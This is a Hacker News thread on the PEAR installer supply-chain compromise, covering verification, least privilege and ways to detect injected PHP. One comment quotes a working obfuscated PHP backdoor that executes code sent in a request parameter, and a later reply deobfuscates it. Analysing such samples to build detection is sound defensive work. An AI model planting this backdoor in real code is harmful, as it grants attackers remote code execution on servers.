Pear.php.net shuts down after maintainers discover serious supply-chain attack (arstechnica.com)
144 points by afshinmeh 29 days ago | 45 comments

> The officials didn’t say when the hack of their Web server occurred or precisely what the malicious version of go-pear.phar did to infected systems.

From Twitter (https://twitter.com/pear):

> What we know: the tainted go-pear.phar file was reported to us on 1/18 by the Paranoids FIRE Team. The last release of this file was done 12/20, so the taint occurred after that. The taint was verified by us on 1/19.

> What we know: The taint was an embedded line designed to spawn a reverse shell via Perl to an IP address. This IP has been reported to its host in relation to the taint.

> What we know: no other breach was identified. The install-pear-nozlib.phar was ok. The go-pear.phar file at GitHub was ok, and could be used as a good md5sum comparison for any suspect copies.

> If you downloaded go-pear.phar before 12/20, we have no concrete evidence you received a tainted file... but it would be prudent to check your system if you used go-pear.phar to perform a PEAR installation in the last several months.
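The md5sum comparison the PEAR team suggests is easy to script. A minimal sketch in Python (the file names are placeholders — substitute your local copy and a copy fetched from the GitHub mirror):

```python
import hashlib

def file_md5(path):
    """Return the hex MD5 digest of a file, read in chunks."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# Hypothetical usage: compare a suspect local copy against a
# known-good copy fetched from GitHub.
# if file_md5("go-pear.phar") != file_md5("go-pear-from-github.phar"):
#     print("MISMATCH - treat the local copy as suspect")
```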

A good reminder to run your webserver with only the privileges it needs, including read/write permissions on the filesystem outside www and shell execution of commands on the system.

Also not a bad idea to have some kind of file compare against a "known good" folder of your site(s) to determine if any files have been modified or added, such as webshells.

For "known good" folder, a git repository may help, at least to restore a clean version of the code.

Probably preaching to the choir here, but for those who are unaware, be sure that .git directories are not accessible by web clients. It will lead to source code disclosure, and if you've checked in any secrets, credential exposure as well.

That and if the webserver can write to .git it can also invisibly modify the history to ensure that you continue to check out the backdoored code no matter how far you go back.

The challenge for comparisons is doing it all offline, in a way that's indistinguishable from user activity. I've seen cases where the attacker updated tripwire, rpm/deb checksums, etc., or only presented the payload to a specific process or to requesting IPs not on the local network. In this case I'd want something like a randomized process where a new EC2 instance does an install, because that's also what many real targets will do — it makes the attack a lot harder to cloak.

It just shows how few people verify PGP signatures, if this went undiscovered for a month.

It doesn't look like they were signing releases until two days ago with 1.10.10.

Aptly timed vulnerability with this article https://research.swtch.com/deps

I do find just pulling dependencies blindly from the internet concerning.

What is the alternative? What do you propose?

Not blindly pulling in dependencies from the internet?

"Blindly" is the problem here, not "pulling dependencies" or "internet".

Also, no, you won't get to a literally 0.0000...% chance of bad stuff getting into your code, but some simple due diligence will slice several orders of magnitude off your probabilities; pick up another couple if the community in general also tends to have people examining their dependencies. It gets to be pretty hard to sneak stuff in under those circumstances. It's been done, so we know it's not 0.0000...% likely, but it's less likely than the current state of the art in several language communities.

(And, also, yes, said language communities are working on it. I salute them for this effort, not condemn them for the existing problem.)

Hillel Wayne did a detailed analysis of the event-stream issue, and it's really worth reading if you're interested in how to make this situation more robust:


I probably still have some old Slackware discs around somewhere.


> Aptly timed vulnerability

I C what you did there https://www.debian.org/security/2019/dsa-4371

Almost, you are mixing up homepage posts. You are talking about https://news.ycombinator.com/item?id=18958679.

I wish I was that clever

Also the discussion on it here: https://news.ycombinator.com/item?id=18979596

Thankfully nobody is using PEAR anymore. Using Composer doesn't solve the problem of blindly pulling internet dependencies, though (as others pointed out).

What I currently do is grepping vendor for common smells like usage of eval() or obfuscations of the same thing after doing a composer update on a project.

> Thankfully nobody is using PEAR anymore

How many thousands of people are in that “nobody”? The places which have legacy baked in are probably also the least equipped to avoid it, too.

Grepping has commonly been evaded since at least the late 90s. lowercased pointed out the use of request values already. Other techniques include encoding a string or byte array and decoding it into a file, pipe, etc. Static analysis can catch some things but it’s fundamentally the halting problem unless you can apply very restrictive sandbox policies — no file I/O, whitelist a few lines which can do certain operations, etc.

It's hard to find obfuscations of stuff. I ran across this recently...

  <?php $z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();?>

There's no 'eval' or 'base64_decode' easy thing to grep for.
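The sample isn't magic, though: replaying its string-building in any language recovers the hidden names. A Python transcription of the lookups above (note the actual payload still arrives at runtime via the request parameter, so this only recovers the function names, not the attacker's code):

```python
# The obfuscated sample builds its function names at runtime:
c2 = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2"   # character pool
y3 = [8, 38, 15, 7, 6, 4, 26, 25, 7, 34, 24, 25, 7]  # indexes into the pool
q1 = "".join(c2[i] for i in y3)

# strrev("noi"."tcnuf"."_eta"."erc") in the PHP sample:
v5 = ("noi" + "tcnuf" + "_eta" + "erc")[::-1]

print(q1)  # base64_decode
print(v5)  # create_function
```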

You might be able to catch that by looking for lines with unusually high entropy. Something like this: https://codereview.stackexchange.com/a/909
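A Shannon-entropy scorer along those lines is only a few lines of Python; a sketch (the 4.5 bits/char threshold is a guess you would tune against your own codebase):

```python
import math
from collections import Counter

def shannon_entropy(line):
    """Bits per character of the line's character distribution."""
    if not line:
        return 0.0
    counts = Counter(line)
    n = len(line)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def flag_suspicious(text, threshold=4.5):
    """Yield (line number, entropy) for unusually dense lines."""
    for lineno, line in enumerate(text.splitlines(), 1):
        h = shannon_entropy(line)
        if h > threshold:
            yield lineno, h
```

Obfuscated one-liners tend to score well above ordinary prose or code because they pack many distinct symbols into a single line.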

The problem with approaches like this is that they're prone to false positive/negatives. Take the example above — you could move more payload into the REQUEST variable (say a Cookie header), do more of the array of numbers so no individual token is that noteworthy, you could do something like toss that into a wrapper so someone sees something which looks like (and may actually be) an x509 cert or GPG public key with some misleading comment about that being used to verify updates, toss it into an image or other “fixture” in a test directory a la event-stream, etc.

This is a much harder problem than anything someone is going to come up with in an HN reply on first reaction. People have been working on it for decades but it's especially hard because once a technique becomes popular an attacker can run offline attacks against it and not release their exploit until they've confirmed that it's not detected.

Agreed, it's difficult to catch. For the record, in this case both functions are present; the decoded code looks something like this:

  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution
`create_function()`[1] internally executes `eval()`, so the result would be the same.

[1] http://php.net/create_function

Grep for multiple semicolons on a line. Or lines exceeding N characters. Or `$_` outside some specific places. Or multiple short variable names on the same line. Or "<?php[^$]".

Salt and flavour per your coding style and code base.
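Those heuristics translate directly into a small scanner. A sketch in Python (the patterns and their wording are illustrative, not a vetted ruleset — expect false positives on legitimate minified or generated code):

```python
import re

# Each pattern mirrors one of the grep ideas above.
SMELLS = [
    (re.compile(r";[^;\n]*;[^;\n]*;"), "three or more statements on one line"),
    (re.compile(r"^.{500,}$"), "suspiciously long line"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"), "superglobal access"),
    (re.compile(r"<\?php\S"), "no whitespace after the <?php tag"),
]

def scan(source):
    """Return (line number, description) pairs for lines matching any smell."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for pattern, desc in SMELLS:
            if pattern.search(line):
                hits.append((lineno, desc))
    return hits
```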

No, that's just an arms race, and it's advantage attacker since in security we generally assume the attacker has our source and executables. Plus it's ultimately an instance of the halting problem; there is no way to run code to determine if another piece of code is "good" for any sensible definition of "good". (See Rice's Theorem.)

You need to ensure bad stuff can't get in, not let stuff in and try to determine what's bad after the fact.

What aspect of information security is not inherently advantage attacker?

Regarding "ensure bad stuff can't get in", that is a completely different aspect. No matter how well you "ensure", bad stuff will always get it. Thus security is done in layers.

You could create a readability score from normal non-malicious code.

Even though I do not know what the above code does, at a glance I can tell that this is not normal code. A machine could too.

I think package management is very dangerous!

Does anyone know if composer ever uses PEAR?

It doesn't.

Composer does support pulling packages from PEAR (https://getcomposer.org/doc/05-repositories.md#pear), but through their own implementation and not go-pear.phar.

...but that doesn't mean that it wouldn't also be susceptible to this kind of attack.

Are GNU/Linux distros affected?

Only an installer on pear.php.net was compromised. I think a "proper" package would be built from the source code, bypassing that installer.

But a more ad hoc package, like from Arch's AUR, might just fetch that installer from pear.php.net instead. In fact, that's what the AUR package did - it just hardcodes the URL of the installer.

The AUR package was (probably) not compromised, but perhaps only because it happened to use the nozlib version of the installer instead of the version that was compromised.

This is how the AUR package looked at the time: https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=php-p...

And this is how it looks now: https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=php-p...

The old PKGBUILD does have a hash, but I don't know if it was obtained from a trusted source. So I would guess that if it had used the compromised installer, and the installer was compromised after the PKGBUILD was updated to use that release, it would have alerted people that the installer had been replaced.

The new PKGBUILD uses the Github release and includes a PGP key.


I think that comic is about people who voluntarily stop maintaining/publishing something other people rely on, not about more general supply chain security.

Although the same applies to packages and libraries, so I would call it related, but not entirely on topic.

I'm not doing PHP anymore, but I hadn't heard of PEAR in a long time; everybody seems to have used Composer for quite a while. Seems like the transition happened in 2014-2015.

If a company uses open source without investing in it, it will eventually have to invest in open source to keep using it. Well, at least it falls under the security budget and doesn't look like a voluntarily paid tax anymore.

This article is outdated. Check the PEAR Twitter profile for new information.

It would be nice if journalists would keep up with the things they report on.

It would be nice if you'd highlight what is outdated rather than a vague assertion and a "go look on Twitter".

Maybe even provide a link to the Twitter profile.

Even if it's not shut down anymore the information is still highly relevant.

It's still down, though.
